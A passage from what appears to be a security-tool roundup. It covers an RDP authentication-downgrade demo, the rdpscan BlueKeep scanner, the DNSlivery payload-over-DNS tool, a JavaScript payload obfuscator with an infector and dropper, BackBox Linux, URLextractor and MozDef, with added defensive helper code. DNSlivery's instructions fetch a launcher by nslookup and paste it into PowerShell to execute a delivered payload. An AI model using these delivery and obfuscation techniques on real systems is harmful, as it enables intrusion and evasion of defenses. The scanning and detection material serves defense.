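    original = build_connection_request(PROTOCOL_SSL | PROTOCOL_HYBRID | PROTOCOL_HYBRID_EX)
    forged = downgrade(original, PROTOCOL_SSL)
    print(parse_requested_protocols(original), "->", parse_requested_protocols(forged))
    print("NLA enforced:", server_decision(parse_requested_protocols(forged), True))
    print("NLA optional:", server_decision(parse_requested_protocols(forged), False))
```

The first line of the demo ("Downgrading authentication options from 11 to 3") is exactly the rewrite `downgrade(pkt, 3)`; the later "Downgrading CredSSP" step corresponds to `downgrade(pkt, 1)`, which only succeeds against a server whose decision function takes the `nla_required=False` branch. Requiring NLA (and teaching users not to click through certificate warnings) is therefore the configuration fix the paper recommends.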

Requirements
  • python3
  • tcpdump
  • arpspoof
    arpspoof is part of dsniff
  • openssl

Disclaimer
Use at your own risk. Do not use without full consent of everyone involved. For educational purposes only.



Rdpscan - A Quick Scanner For The CVE-2019-0708 "BlueKeep" Vulnerability


This is a quick-and-dirty scanner for the CVE-2019-0708 vulnerability in Microsoft Remote Desktop. Right now, there are about 900,000 machines on the public Internet vulnerable to it, so a worm like WannaCry or NotPetya is widely expected soon. Therefore, scan your networks and patch (or at least enable NLA on) vulnerable systems.
This is a command-line tool. You can download the source and compile it yourself, or you can download one of the pre-compiled binaries for Windows or macOS from the link above.
This tool is based entirely on the rdesktop patch from https://github.com/zerosum0x0/CVE-2019-0708.

Primary use
To scan a network, run it like the following:
rdpscan 192.168.1.1-192.168.1.255
This produces one of 3 results for each address:
  • SAFE - if the target has been determined to be patched, or at least requires CredSSP/NLA
  • VULNERABLE - if the target has been confirmed to be vulnerable
  • UNKNOWN - if the target doesn't respond or has some protocol failure
When nothing exists at a target IP address, older versions printed the message "UNKNOWN - connection timed out". When scanning large networks, this produces an overload of information about systems you don't care about. Therefore, the new version by default doesn't print it unless you add -v (for verbose) on the command-line.
You can increase the speed at which it scans large networks by increasing the number of workers:
rdpscan --workers 10000 10.0.0.0/8
However, on my computer, it only produces about 1500 workers, because of system limitations, no matter how high I configure this parameter.
You can increase the speed even more by using this in conjunction with masscan, described in the section below.

Interpreting the results
There are three general responses:
  • SAFE - which means the target is probably patched or otherwise not vulnerable to the bug.
  • VULNERABLE - which means we've confirmed the target is vulnerable to this bug, and that when the worm hits, it will likely get infected.
  • UNKNOWN - which means we can't confirm either way, usually because the target doesn't respond or isn't running RDP, which is the vast majority of responses. Also, when targets are out of resources or experiencing network problems, we'll get a lot of these. Finally, protocol errors are responsible for a lot.
While the three main responses are SAFE, VULNERABLE, and UNKNOWN, they contain additional text explaining the diagnosis. This section describes the various strings you'll see.

SAFE
There are three main reasons we think a target is safe:
  • SAFE - Target appears patched: This happens when the target doesn't respond to the triggering request. This means it's a Windows system that's been patched, or a system that wasn't vulnerable to begin with, like Windows 10 or Unix.
  • SAFE - CredSSP/NLA required: This means that the target first requires Network Level Authentication before the RDP connection can be established. The tool cannot pass this point without legitimate credentials, so cannot determine whether the target has been patched. However, hackers can't continue past this point to exploit vulnerable systems either, so you are likely "safe". However, when exploits appear, insiders with valid usernames/passwords will be able to exploit the system if it's un-patched.
  • SAFE - not RDP: This means the system is not RDP, but has some other service that happens to use this same port, and produces a response that's clearly not RDP. Common examples are HTTP and SSH. Note however that instead of an identifiable protocol, a server may respond with a RST or FIN packet. These are identified as UNKNOWN instead of SAFE.

VULNERABLE
This means we've confirmed the system is vulnerable to the bug.
  • VULNERABLE - got appid: There is only one response when the system is vulnerable, this one.

UNKNOWN
There are a zillion variations for unknown:
  • UNKNOWN - no connection - timeout: This is by far the most common response, and happens when the target IP address makes no response whatsoever. In fact, it's so common that when scanning large ranges of addresses, it's usually omitted. You have to add the -v (verbose) flag in order to enable it.
  • UNKNOWN - no connection - refused (RST): This is by far the second most common response, and happens when the target exists and responds to network traffic, but isn't running RDP, so refuses the connection with a TCP RST packet.
  • UNKNOWN - RDP protocol error - receive timeout: This is the third most common response, and happens when we've successfully established an RDP connection, but then the server stops responding to us. This is due to network errors, or to the target system being overloaded for some reason. It could also be network errors on this end, such as when you are behind a NAT and overloading it with too many connections.
  • UNKNOWN - no connection - connection closed: This means we've established a connection (TCP SYN-ACK), but then the connection is immediately closed (with a RST or FIN). There are many reasons this happens, which we cannot distinguish:
    • It's running RDP, but for some reason closes the connection, possibly because it's out of resources.
    • It's not RDP, and doesn't like the RDP request we send it, so instead of sending us a nice error message (which would trigger SAFE - not RDP), it abruptly closes the connection.
    • Some intervening device, like an IPS, firewall, or NAT, closed the connection because it identified this as hostile, or ran out of resources.
    • Some other reason I haven't identified; there's a lot of weird stuff happening when I scan the Internet.
  • UNKNOWN - no connection - host unreachable (ICMP error): The remote network reports the host cannot be reached or is not running. Try again later if you think that host should be alive.
  • UNKNOWN - no connection - network unreachable (ICMP error): There is a (transient) network error on the far end; try again later if you believe that network should be running.
  • UNKNOWN - RDP protocol error: This means some corruption happened in the RDP protocol, either because the remote side implements it wrong (not a Windows system), because it's handling a transient network error badly, or something else.
  • UNKNOWN - SSL protocol error: Since Windows Vista, RDP uses a STARTTLS-style negotiation to run over SSL/TLS. This layer has its own problems like the above, which include handling underlying network errors badly, or trying to communicate with systems that have some sort of incompatibility. If you get a very long error message here (like SSL3_GET_RECORD:wrong version), it's because the other side has a bug in SSL, or the SSL library you are using has a bug.

Using with masscan
This rdpscan tool is fairly slow, only scanning a few hundred targets per second. You can instead use masscan to speed things up. The masscan tool is roughly 1000 times faster, but only gives limited information on the target.
The steps are:
  • First scan the address ranges with masscan to quickly find hosts that respond on port 3389 (or whatever port you use).
  • Second feed the output of masscan into rdpscan, so it only has to scan targets we know are active.
The simple way to run this is just to combine them on the command-line:
masscan 10.0.0.0/8 -p3389 | rdpscan --file -
The way I do it is in two steps:
masscan 10.0.0.0/8 -p3389 > ips.txt
rdpscan --file ips.txt --workers 10000 >results.txt

Building
The difficult part is getting the OpenSSL libraries installed, and not conflicting with other versions on the system. Some examples for versions of Linux I've tested on are the following, but they keep changing package names from one distribution to the next. Also, there are many options for an OpenSSL-compatible API, such as BoringSSL and LibreSSL.
$ sudo apt install libssl-dev
$ sudo yum install openssl-devel
Once you've solved that problem, you just compile all the .c files together like this:
$ gcc *.c -lssl -lcrypto -o rdpscan
I've put a Makefile in the directory that does this, so you can likely do just:
$ make
The code is written in C, so needs a C compiler installed, such as doing the following:
$ sudo apt install build-essential

Common build errors
This section describes the more obvious build errors.
ssl.h:24:25: fatal error: openssl/rc4.h: No such file or directory
This means you either don't have the OpenSSL headers installed, or they aren't in a path somewhere. Remember that even if you have OpenSSL binaries installed, this doesn't mean you've got the development stuff installed. You need both the headers and libraries installed.
To install these things on Debian, do:
$ sudo apt install libssl-dev
To fix the path issue, add a compilation flag -I/usr/local/include, or something similar.
An example linker problem is the following:
Undefined symbols for architecture x86_64:
"_OPENSSL_init_ssl", referenced from:
_tcp_tls_connect in tcp-fac73c.o
"_RSA_get0_key", referenced from:
_rdssl_rkey_get_exp_mod in ssl-d5fdf5.o
"_SSL_CTX_set_options", referenced from:
_tcp_tls_connect in tcp-fac73c.o
"_X509_get_X509_PUBKEY", referenced from:
_rdssl_cert_to_rkey in ssl-d5fdf5.o
I get this on macOS because there's multiple versions of OpenSSL. I fix this by hard-coding the paths:
$ gcc *.c -lssl -lcrypto -I/usr/local/include -L/usr/local/lib -o rdpscan
According to comments by others, the following command-line might work on macOS if you've used Homebrew to install things. I still get the linking errors above, though, because I've installed other OpenSSL components that are conflicting.
gcc $(brew --prefix)/opt/openssl/lib/libssl.a $(brew --prefix)/opt/openssl/lib/libcrypto.a -o rdpscan *.c

Running
The section above gives quickstart tips for running the program. This section gives more in-depth help.
To scan a single target, just pass the address of the target:
./rdpscan 192.168.10.101
You can pass in IPv6 addresses and DNS names. You can pass in multiple targets. An example of this would be:
./rdpscan 192.168.10.101 exchange.example.com 2001:0db8:85a3::1
You can also scan ranges of addresses, using either begin-end IPv4 addresses, or IPv4 CIDR spec. IPv6 ranges aren't supported because they are so big.
./rdpscan 10.0.0.1-10.0.0.25 192.168.0.0/16
By default, it scans only 100 targets at a time. You can increase this number with the --workers parameter. However, no matter how high you set this parameter, in practice you'll get a max of around 500 to 1500 workers running at once, depending upon your system.
./rdpscan --workers 1000 10.0.0.0/24
Instead of specifying targets on the command-line, you can load them from a file instead, using the well-named --file parameter:
./rdpscan --file ips.txt
The format of the file is one address, name, or range per line. It can also consume the text generated by masscan. Extra whitespace is trimmed, blank lines are ignored, and any comment lines are ignored. A comment is a line starting with the # character, or the // characters.
The output is sent to stdout giving the status of VULNERABLE, SAFE, or UNKNOWN. There could be additional reasons for each. These reasons are described above.
211.101.37.250 - SAFE - CredSSP/NLA required
185.11.124.79 - SAFE - not RDP - SSH response seen
125.121.137.42 - UNKNOWN - no connection - refused (RST)
40.117.191.215 - SAFE - CredSSP/NLA required
121.204.186.182 - SAFE - CredSSP/NLA required
99.8.11.148 - SAFE - CredSSP/NLA required
121.204.186.114 - SAFE - CredSSP/NLA required
49.50.145.236 - SAFE - CredSSP/NLA required
106.12.74.155 - VULNERABLE - got appid
222.84.253.26 - SAFE - CredSSP/NLA required
144.35.133.109 - UNKNOWN - RDP protocol error - receive timeout
199.212.226.196 - UNKNOWN - RDP protocol error - receive timeout
183.134.58.152 - UNKNOWN - no connection - refused (RST)
83.162.246.149 - VULNERABLE - got appid
You can process this with additional unix commands like grep and cut. To get a list of just vulnerable machines:
./rdpscan 10.0.0.0/8 | grep 'VULN' | cut -f1 -d'-'
The parameter -dddd means diagnostic information, where the more ds you add, the more details are printed. This is sent to stderr instead of stdout so that you can separate the streams. Using bash this is done like this:
./rdpscan --file myips.txt -ddd 2> diag.txt 1> results.txt
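Added example, not rdpscan's own code: turning rdpscan's stdout into a per-host verdict, a triage summary and a retry list, plus a reader for the --file input format, so the grep | cut pipeline above becomes something you can hand to a patching workflow. Result lines follow the sample above, '<target> - <STATUS> - <reason>', where the reason may itself contain ' - '. SAMPLE_RESULTS is copied from the page's sample output; the --file text in the usage is constructed. Which UNKNOWN reasons are treated as transient follows the page's own descriptions of them.

```python
"""Parse rdpscan results and target files for triage (added example)."""
import re
from collections import Counter
from typing import List, Tuple

# Lines taken from the page's sample output.
SAMPLE_RESULTS = """\
211.101.37.250 - SAFE - CredSSP/NLA required
185.11.124.79 - SAFE - not RDP - SSH response seen
125.121.137.42 - UNKNOWN - no connection - refused (RST)
106.12.74.155 - VULNERABLE - got appid
144.35.133.109 - UNKNOWN - RDP protocol error - receive timeout
83.162.246.149 - VULNERABLE - got appid
"""

_RESULT = re.compile(r"^(\S+) - (SAFE|VULNERABLE|UNKNOWN)(?: - (.*))?$")
# UNKNOWN reasons the page describes as worth retrying later.
TRANSIENT = ("receive timeout", "host unreachable", "network unreachable", "connection closed")


def parse_results(text: str) -> List[Tuple[str, str, str]]:
    """[(target, status, reason)] for every well-formed line; other lines are skipped."""
    rows = []
    for line in text.splitlines():
        m = _RESULT.match(line.strip())
        if m:
            rows.append((m.group(1), m.group(2), m.group(3) or ""))
    return rows


def vulnerable_hosts(text: str) -> List[str]:
    """The targets to patch first (the grep 'VULN' | cut pipeline, as a function)."""
    return [t for t, s, _ in parse_results(text) if s == "VULNERABLE"]


def summary(text: str):
    """Counts per status and per (status, reason) pair, for the report."""
    rows = parse_results(text)
    return Counter(s for _, s, _ in rows), Counter((s, r) for _, s, r in rows)


def retry_candidates(text: str) -> List[str]:
    """UNKNOWN results with a transient reason; scan these again later."""
    return [t for t, s, r in parse_results(text)
            if s == "UNKNOWN" and any(k in r for k in TRANSIENT)]


def read_target_file(text: str) -> List[str]:
    """--file format: one target/range per line; blank lines and # or // comments ignored."""
    targets = []
    for line in text.splitlines():
        line = line.strip()
        if line and not line.startswith("#") and not line.startswith("//"):
            targets.append(line)
    return targets


if __name__ == "__main__":
    print(vulnerable_hosts(SAMPLE_RESULTS))
    print(summary(SAMPLE_RESULTS)[0])
    print(retry_candidates(SAMPLE_RESULTS))
    # Constructed --file contents:
    print(read_target_file("# lab\n10.0.0.1\n\n// dmz\n 10.0.0.0/24 \n"))
```

Because diagnostics go to stderr and results to stdout, feeding `results.txt` from the redirect above into `parse_results` never has to skip `[+]`/`[-]` lines; keep the two streams separate as the page shows and the regexp stays simple.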

Diagnostic info
Adding the -d parameter dumps diagnostic info on the connections to stderr.
./rdpscan 62.15.34.157 -d

[+] [62.15.34.157]:3389 - connecting...
[+] [62.15.34.157]:3389 - connected from [10.1.10.133]:49211
[+] [62.15.34.157]:3389 - SSL connection
[+] [62.15.34.157]:3389 - version = v4.8
[+] [62.15.34.157]:3389 - Sending MS_T120 check packet
[-] [62.15.34.157]:3389 - Max sends reached, waiting...
62.15.34.157 - SAFE - Target appears patched
On macOS/Linux, you can redirect stdout and stderr separately to different files in the usual manner:
./rdpscan --file ips.txt 2> diag.txt 1> results.txt

SOCKS5 and Tor lulz
So it includes SOCKS5 support:
./rdpscan --file ips.txt --socks5 localhost --socks5port 9050
It makes connection problems worse so you get a lot more "UNKNOWN" results.

Statically link OpenSSL
For releasing the Windows and macOS binaries attached as releases to this project I statically link OpenSSL, so that it doesn't need to be included separately, and the programs just work. This section describes some notes on how to do this, especially since the description on OpenSSL's own page seems to be out of date.
Both these steps start with downloading the OpenSSL source and putting it next to the rdpscan directory:
git clone https://github.com/openssl/openssl

Windows
For Windows, you need to first install some version of Perl. I use the one from ActiveState.
Next, you'll need a special "assembler". I use the recommended one, called NASM.
Next, you'll need a compiler. I use VisualStudio 2010. You can download the latest "Visual Studio Community Edition" (which is 2019) instead from Microsoft.
Now you need to build the makefile. This is done by going into the OpenSSL directory and running the Configure Perl program:
perl Configure VC-WIN32
I chose 32-bit for Windows because there's a lot of old Windows out there, and I want to make the program as compatible as possible with old versions.
I want a completely static build, including the C runtime. To do that, I opened the resulting makefile in an editor, and changed the C compilation flag from /MD (meaning use DLLs) to /MT. While I was there, I added the following to the CPPFLAGS: -D_WIN32_WINNT=0x501, which restricts OpenSSL to features that work back on Windows XP and Server 2003. Otherwise, you get errors that bcrypt.dll was not found if you run on those older systems.
Now you'll need to make sure everything is in your path. I copied nasm.exe to the a directory in the PATH. For Visual Studio 2010, I ran the program vcvars32.bat to setup the path variables for the compiler.
At this point on the command-line, I typed:
nmake
This makes the libraries. The static ones are libssl_static.lib and libcrypto_static.lib, which I use to link to in rdpscan.

macOS
First of all, you need to install a compiler. I use the Developer Tools from Apple, installing XCode and the compiler. I think you can use Homebrew to install gcc instead.
Then go into the source directory for OpenSSL and create a makefile:
perl Configure darwin64-x86_64-cc
Now simply make it:
make depend
make
At this point, it's created both dynamic (.dylib) and static (.lib) libraries. I deleted the dynamic libraries so that it'll catch the static ones by default.
Now in rdpscan, just build the macOS makefile:
make -f Makefile.macos
This will compile all the rdpscan source files, then link to the OpenSSL libraries in the directory ../openssl that you just built.
This should produce a 3-megabyte executable. If you instead only got a 200-kilobyte executable, then you made a mistake and linked to the dynamic libraries instead.
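The size check above is a rough one. A more direct way to confirm that a macOS build did not pick up the dynamic OpenSSL libraries is to inspect what the binary references with otool -L. The script below is an added example, not part of the rdpscan project: it parses otool -L output for libssl/libcrypto .dylib references, applies the size heuristic from the text (the 1 MB threshold is an assumption chosen between the 3 MB and 200 KB figures quoted above), and combines both for a real binary. The two otool outputs at the bottom are constructed samples.

```shell
#!/bin/sh
# Added example (not from the rdpscan project): verify that a macOS rdpscan
# build links OpenSSL statically. A build that picked up the .dylib files
# still references them, and `otool -L` lists those references.

# Reads `otool -L` output on stdin. Returns 0 (static) when no OpenSSL
# dylib is referenced, 1 otherwise.
check_static_openssl() {
    ! grep -Eiq 'lib(ssl|crypto)[^[:space:]]*\.dylib'
}

# Size heuristic from the text: ~3 MB static vs ~200 KB dynamic.
# The 1,000,000-byte threshold is an assumption between those two figures.
size_looks_static() {
    [ "$1" -ge 1000000 ]
}

# Both checks on a real binary (assumes macOS `otool` and BSD `stat -f %z`).
rdpscan_is_static() {
    bin="$1"
    otool -L "$bin" | check_static_openssl || return 1
    size_looks_static "$(stat -f %z "$bin")"
}

# Constructed sample `otool -L` outputs for the two cases.
DYNAMIC_SAMPLE='rdpscan:
    /usr/local/opt/openssl/lib/libssl.1.1.dylib (compatibility version 1.1.0, current version 1.1.0)
    /usr/local/opt/openssl/lib/libcrypto.1.1.dylib (compatibility version 1.1.0, current version 1.1.0)
    /usr/lib/libSystem.B.dylib (compatibility version 1.0.0, current version 1252.250.1)'
STATIC_SAMPLE='rdpscan:
    /usr/lib/libSystem.B.dylib (compatibility version 1.0.0, current version 1252.250.1)'

# Usage: ./check_static.sh ./rdpscan
if [ "$#" -eq 1 ]; then
    if rdpscan_is_static "$1"; then
        echo "$1: OpenSSL statically linked"
    else
        echo "$1: dynamic OpenSSL or too small, rebuild after removing the .dylib files" >&2
    fi
fi
```

The grep is deliberately case-insensitive and tolerates versioned names such as libssl.1.1.dylib or libcrypto.3.dylib, so it keeps working across OpenSSL releases.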



DNSlivery - Easy Files And Payloads Delivery Over DNS


Easy files and payloads delivery over DNS.

Acknowledgments
This project has been originally inspired by PowerDNS and Joff Thyer's technical segment on the Paul's Security Weekly podcast #590 (youtu.be/CP6cIwFJswQ).

Description

TL;DR
DNSlivery allows delivering files to a target using DNS as the transport protocol.
Features:
  • allows to print, execute or save files to the target
  • does not require any client on the target
  • does not require a full-fledged DNS server 

What problem are you trying to solve?
Easily deliver files and/or payloads to a compromised target where classic web delivery is not possible and without the need for a dedicated client software. This applies to restricted environments where outgoing web traffic is forbidden or simply inspected by a curious web proxy.


Even though more complete DNS tunneling tools already exist (such as dnscat2 and iodine), they all require running a dedicated client on the target. The problem is that there is probably no other way than DNS to deliver the client in such restricted environments. In other words, building a DNS communication channel with these tools requires already having a DNS communication channel.
In comparison, DNSlivery only provides one-way communication from your server to the target, but does not require any dedicated client to do so. Thus, if you need to build a reliable two-way communication channel over DNS, use DNSlivery to deliver the client of a more advanced DNS tunneling tool to your target.

How does it work?
Just like most DNS tunneling tools, DNSlivery uses TXT records to store the content of files in their base64 representation. However, it does not require setting up a full-fledged DNS server. Instead, it uses the scapy library to listen for incoming DNS packets and craft the desired response.


As most files do not fit in a single TXT record, DNSlivery creates multiple ordered records, each containing a base64 chunk of the file. As an example, the diagram in the original README (not reproduced here) illustrates the delivery of the 42nd chunk of the file named file.
In order to retrieve all base64 chunks and put them back together without a dedicated client on the target, DNSlivery generates, for every file:
  • a simple cleartext launcher
  • a reliable base64 encoded stager

This two-stage delivery process is required to add features to the stager (such as handling lost DNS responses) that would otherwise not fit in a single TXT record.
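The mechanism described above has a measurable footprint: a file of a given size needs a predictable number of TXT records, and each record is one lookup that a resolver or DNS query log will see. The block below is an added example and not DNSlivery's own code. It shows how a file turns into ordered base64 chunks at the default 255-character size and how many lookups that implies, then a defender-side heuristic over DNS query-log lines that flags a client requesting an unusual number of distinct TXT names under one delegated zone. The query-log format and the <index>.<file>.<zone> naming used in the sample lines are constructed for this example; they are not taken from the project.

```python
"""Added example, not DNSlivery's own code: chunk sizing for TXT-record
delivery, and a query-log heuristic that spots the burst of TXT lookups it
produces. Log format and '<index>.<file>.<zone>' naming are constructed."""
import base64
import math
import re
from collections import defaultdict

CHUNK_SIZE = 255  # default base64 chunk size from the usage text


def txt_chunks(data, size=CHUNK_SIZE):
    """Base64-encode the whole file, then split into TXT-sized pieces.
    255 is the maximum length of one character-string in TXT RDATA
    (RFC 1035 section 3.3.14), hence the default."""
    b64 = base64.b64encode(data).decode("ascii")
    return [b64[i:i + size] for i in range(0, len(b64), size)]


def chunk_count(file_size, size=CHUNK_SIZE):
    """TXT records (and therefore lookups) needed for file_size bytes:
    base64 turns every 3 input bytes into 4 output characters."""
    b64_len = 4 * math.ceil(file_size / 3)
    return math.ceil(b64_len / size)


def reassemble(chunks):
    """Inverse of txt_chunks; order matters, which is why records are numbered."""
    return base64.b64decode("".join(chunks))


# Defender side. Constructed BIND-like query-log lines:
#   client <ip>#<port>: query: <qname> IN TXT + (<server>)
LOG_RE = re.compile(
    r"client (?P<src>\d+\.\d+\.\d+\.\d+)#\d+.*?query: (?P<qname>\S+) IN TXT")


def txt_query_burst(log_lines, zone, threshold=10):
    """Return {client_ip: distinct TXT names} for clients that asked for at
    least `threshold` distinct TXT records under `zone`. Ordinary hosts need
    a handful of TXT records (SPF, DMARC, DKIM); a chunked file needs
    chunk_count() of them, so the count itself is the signal."""
    zone = zone.rstrip(".").lower()
    seen = defaultdict(set)
    for line in log_lines:
        m = LOG_RE.search(line)
        if not m:
            continue
        qname = m.group("qname").rstrip(".").lower()
        if qname == zone or qname.endswith("." + zone):
            seen[m.group("src")].add(qname)
    return {src: len(names) for src, names in seen.items()
            if len(names) >= threshold}


SAMPLE_LOG = (
    # One client fetching twelve numbered chunks under the delegated zone.
    [f"client 10.0.0.5#5341{i % 10}: query: {i}.file.dnsd.no0.be IN TXT + (192.0.2.1)"
     for i in range(12)]
    # Ordinary mail-related lookups plus a single lookup from another host.
    + ["client 10.0.0.9#40211: query: _dmarc.example.com IN TXT + (192.0.2.1)",
       "client 10.0.0.9#40212: query: example.com IN TXT + (192.0.2.1)",
       "client 10.0.0.9#40213: query: file.dnsd.no0.be IN TXT + (192.0.2.1)"]
)

if __name__ == "__main__":
    data = b"Write-Host 'hello'\n" * 100          # constructed 1900-byte file
    chunks = txt_chunks(data)
    print(f"{len(data)} bytes -> {len(chunks)} TXT records "
          f"(formula: {chunk_count(len(data))})")
    assert reassemble(chunks) == data
    print("flagged:", txt_query_burst(SAMPLE_LOG, "dnsd.no0.be"))
```

The threshold is per client and per zone, so a mail server validating many domains is not caught by it; what stands out is many distinct names under a single recently delegated subdomain. Combining this count with the TXT-to-total query ratio for the client reduces false positives further.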

Note on target compatibility
Currently, only PowerShell targets are supported. However, DNSlivery could be improved to support additional targets such as bash or python. Please let me know @no0be if this is a feature that you would like to see being implemented.

Requirements
DNSlivery does not require building a complex server infrastructure. In fact, there are only two simple requirements:
  • be able to create a NS record in your public DNS zone
  • have a Linux server capable of receiving udp/53 traffic from the Internet

Setup

DNS Zone
The first step is to delegate a sub-domain to the server that will run DNSlivery by creating a new NS record in your domain. As an example, I created the following record to delegate the sub-domain dnsd.no0.be to the server at vps.no0.be.
dnsd    IN  NS vps.no0.be.
If your zone is managed by a third-party provider, refer to their documentation to create the NS record.

DNSlivery
The only requirements to run DNSlivery are python3 and its scapy library.
git clone https://github.com/no0be/DNSlivery.git && cd DNSlivery
pip install -r requirements.txt

Usage

Server
DNSlivery will serve all files of a given directory (pwd by default) and needs to be run with root privileges to listen for incoming udp/53 packets.
usage: dnslivery.py [-h] [-p PATH] [-s SIZE] [-v] interface domain nameserver

DNSlivery - Easy files and payloads delivery over DNS

positional arguments:
interface interface to listen to DNS traffic
domain FQDN name of the DNS zone
nameserver FQDN name of the server running DNSlivery

optional arguments:
-h, --help show this help message and exit
-p PATH, --path PATH path of directory to serve over DNS (default: pwd)
-s SIZE, --size SIZE size in bytes of base64 chunks (default: 255)
-v, --verbose increase verbosity
Example:
$ sudo python3 dnslivery.py eth0 dnsd.no0.be vps.no0.be -p /tmp/dns-delivery

DNSlivery - Easy files and payloads delivery over DNS

[*] File "file" ready for delivery at file.dnsd.no0.be (7 chunks)
[*] Listening for DNS queries...

Note on filename normalization
As the charset allowed for domain names is much more restrictive than for UNIX filenames (per RFC1035), DNSlivery will perform normalization when required.
Example:
[*] File "My Awesome Powershell Script ;).ps1" ready for delivery at my-awesome-powershell-script----ps1.dnsd.no0.be (1891 chunks)
Be aware that the current normalization code is not perfect, as it takes neither overlapping filenames nor the size limit into account.
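The two gaps named in that note are exactly the RFC 1035 constraints worth checking when a filename becomes a DNS label. The block below is an added example and not DNSlivery's own code: it reproduces the mapping visible in the example above (lower case; every character outside [a-z0-9-] becomes a hyphen), enforces the 63-octet label limit, and refuses distinct filenames that collapse onto the same label. The mapping rule is reconstructed from the page's example output, not read from the project's source.

```python
"""Added example, not DNSlivery's own code: filename-to-label normalization
with the two checks the note above says are missing. The mapping rule is
reconstructed from the page's example, not taken from the project."""
import re

LABEL_MAX = 63  # RFC 1035 section 2.3.4: one label is at most 63 octets


def normalize_label(filename):
    """Lower-case the name and replace anything outside [a-z0-9-] with '-'.
    Raises ValueError when the result cannot be a valid label."""
    label = re.sub(r"[^a-z0-9-]", "-", filename.lower())
    if not label or len(label) > LABEL_MAX:
        raise ValueError(
            f"label length {len(label)} outside 1..{LABEL_MAX}: {label!r}")
    return label


def label_table(filenames):
    """Map label -> original filename for a served directory, refusing
    silent overlaps such as 'a b.ps1' and 'a-b.ps1'."""
    table = {}
    for name in filenames:
        label = normalize_label(name)
        other = table.get(label)
        if other is not None and other != name:
            raise ValueError(
                f"{name!r} and {other!r} both normalize to {label!r}")
        table[label] = name
    return table


def has_conflict(filenames):
    """True when the listing contains an overlap or an invalid label."""
    try:
        label_table(filenames)
        return False
    except ValueError:
        return True


if __name__ == "__main__":
    print(normalize_label("My Awesome Powershell Script ;).ps1"))
    print(label_table(["file", "Notes.txt"]))
    print("conflict:", has_conflict(["a b.ps1", "a-b.ps1"]))
```

Checking the table once at startup, before any record is served, turns an ambiguous lookup into an immediate error instead of the wrong file being delivered silently.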

Target
On the target, start by retrieving the launcher of the desired file by requesting its dedicated TXT record. The following three launchers are supported:
Action   Launcher                    Description
Print    [filename].print.[domain]   (Default) Print the delivered file to the console
Execute  [filename].exec.[domain]    Execute the delivered file (useful for scripts)
Save     [filename].save.[domain]    Save the delivered file to disk (useful for binaries)
nslookup -type=txt [filename].[stager].[domain]
Then, simply copy and paste the launcher quoted in the DNS response to a PowerShell console to retrieve the file on the target.


GhostSquadHackers - Encrypt/Encode Your Javascript Code


Encrypt/Encode your Javascript payloads/code. (Windows Scripting)

This tool is meant to encode and encrypt your javascript code.

Features
  • Number Calculating
  • ASCII codes
  • Caesar-Encryption
  • Hex Encoding
  • Octal encoding
  • Binary Encrypt
  • Random Octal Quotes
  • Add trash to code
  • Url Encode

Current extras:
  • create Badbunny JS-infector
  • customize JS Downloader (payload dropper)
(c) Coded by Necronomikon



BackBox Linux 6.0 - Ubuntu-based Linux Distribution Penetration Test and Security Assessment


BackBox Linux is a penetration testing and security assessment oriented Linux distribution providing a network and systems analysis toolkit. It includes some of the most commonly known and used security and analysis tools, aiming at a wide spread of goals, ranging from web application analysis to network analysis, stress tests, sniffing, vulnerability assessment, computer forensic analysis, automotive and exploitation. It has been built on the Ubuntu core system yet is fully customized, designed to be one of the best penetration testing and security distributions, and more.

As usual, this major release includes many updates. These include a new kernel, updated tools and some structural changes, with a focus on maintaining stability and compatibility with Ubuntu 18.04 LTS.

What’s new
  •     Updated Linux Kernel 4.18
  •     Updated desktop environment
  •     Updated hacking tools
  •     Updated ISO Hybrid with UEFI support


System requirements
  •     32-bit or 64-bit processor
  •     1024 MB of system memory (RAM)
  •     10 GB of disk space for installation
  •     Graphics card capable of 800×600 resolution
  •     DVD-ROM drive or USB port (3 GB)

The ISO images for both 32bit & 64bit can be downloaded from the official web site download section:


URLextractor - Information Gathering and Website Reconnaissance


Information gathering & website reconnaissance

Usage: ./extractor http://www.hackthissite.org/

Tips:
  • Colorex: adds colors to the output. pip install colorex and use it like ./extractor http://www.hackthissite.org/ | colorex -g "INFO" -r "ALERT"
  • Tldextract: used by the dnsenumeration function. pip install tldextract

Features:
  • IP and hosting info like city and country (using FreegeoIP)
  • DNS servers (using dig)
  • ASN, Network range, ISP name (using RISwhois)
  • Load balancer test
  • Whois for abuse mail (using Spamcop)
  • PAC (Proxy Auto Configuration) file
  • Compares hashes to diff code
  • robots.txt (recursively looking for hidden stuff)
  • Source code (looking for passwords and users)
  • External links (frames from other websites)
  • Directory FUZZ (like Dirbuster and Wfuzz, using the Dirbuster directory list)
  • URLvoid API - checks Google page rank, Alexa rank and possible blacklists
  • Provides useful links at other websites to correlate with IP/ASN
  • Option to open ALL results in browser at the end

Changelog to version 0.2.0:
  • [Fix] Changed GeoIP from freegeoip to ip-api
  • [Fix/Improvement] Remove duplicates from robots.txt
  • [Improvement] Better whois abuse contacts (abuse.net)
  • [Improvement] Top passwords collection added to sourcecode checking
  • [New feature] First-run verification to install dependencies if needed
  • [New feature] Log file
  • [New feature] Check for hostname on log file
  • [New feature] Check if hostname is listed on Spamhaus Domain Blacklist
  • [New feature] Run a quick dnsenumeration with common server names

Changelog to version 0.1.9:
  • Abuse mail using lynx instead of curl
  • Target server name parsing fixed
  • More verbose about HTTP codes and directory discovery
  • MD5 collection for IP fixed
  • Links found now show unique URLs from array
  • [New feature] Google results
  • [New feature] Bing IP check for other hosts/vhosts
  • [New feature] Opened ports from Shodan
  • [New feature] VirusTotal information about IP
  • [New feature] Alexa Rank information about $TARGET_HOST

Requirements:
Tested on Kali light mini AND OSX 10.11.3 with brew
sudo apt-get install bc curl dnsutils libxml2-utils whois md5sha1sum lynx openssl -y
Configuration file:
CURL_TIMEOUT=15 #timeout in --connect-timeout
CURL_UA=Mozilla #user-agent (keep it simple)
INTERNAL=NO #YES OR NO (show internal network info)
URLVOID_KEY=your_API_key #using API from http://www.urlvoid.com/
FUZZ_LIMIT=10 #how many lines it will read from fuzz file
OPEN_TARGET_URLS=NO #open found URLs at the end of script
OPEN_EXTERNAL_LINKS=NO #open external links (frames) at the end of script
FIRST_TIME=YES #if first time check for dependencies



MozDef - Mozilla Enterprise Defense Platform


The inspiration for MozDef comes from the large arsenal of tools available to attackers. Suites like metasploit, armitage, lair, dradis and others are readily available to help attackers coordinate, share intelligence and finely tune their attacks in real time. Defenders are usually limited to wikis, ticketing systems and manual tracking databases attached to the end of a Security Information Event Management (SIEM) system.
The Mozilla Enterprise Defense Platform (MozDef) seeks to automate the security incident handling process and facilitate the real-time activities of incident handlers.

Goals
High level
  • Provide a platform for use by defenders to rapidly discover and respond to security incidents.
